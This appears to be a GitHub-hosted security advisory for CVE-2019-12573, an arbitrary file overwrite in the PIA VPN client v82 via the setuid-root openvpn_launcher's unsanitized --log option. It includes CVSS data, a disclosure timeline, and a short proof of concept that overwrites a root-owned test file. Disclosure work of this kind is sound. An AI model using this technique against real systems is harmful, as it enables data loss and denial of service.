Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12573.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
72 lines (44 sloc)
1.74 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA Linux, macOS Arbitrary File Overwrite | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12573 | |
| Vendor Advisory: N/A | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) | |
| VPN Client v82 for Linux and macOS could allow an authenticated, local | |
| attacker to overwrite arbitrary files. | |
| The PIA Linux and macOS openvpn_launcher binary is setuid root. This | |
| binary supports the --log option which accepts a path as an argument. | |
| The --log parameter is not sanitized which allows a local unprivileged | |
| to overwrite arbitrary files owned by any user on the system, including | |
| root. This creates a denial of service condition and possible data loss | |
| if leveraged by a malicious local user. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C | |
| Base: 7.1 | |
| Temporal: 7.1 | |
| Test Environment | |
| OS: Ubuntu 18.04.1 LTS | |
| Kernel: 4.15.0-29-generic | |
| PIA Version: v82 | |
| OS: macOS Mojave 10.14.1 | |
| Kernel: Darwin Kernel Version 18.2.0 | |
| PIA Version: v82 | |
| Steps to reproduce | |
| Step 1 - Create a root owned test file. For this PoC /etc/test.txt is used. | |
| # As root | |
| echo "this is a test" > /etc/test.txt | |
| chmod 600 /etc/test.txt | |
| Step 2 - Overwrite the file using the --log option using a non privileged user. | |
| # macOS | |
| /Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt | |
| # Linux | |
| /opt/pia/openvpn_launcher.64 --log /etc/test.txt | |
| Step 3 - Verify the file contents have been overwritten | |
| # As root | |
| cat /etc/test.txt | |
| Timeline: | |
| 2018-12-23: Reported to vendor | |
| 2018-12-23: Vendor acknowledged receipt of report | |
| 2019-01-18: Vendor states fix will be available in v83 however this version was never released. | |
| The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | |
| 2019-06-10: Public disclosure |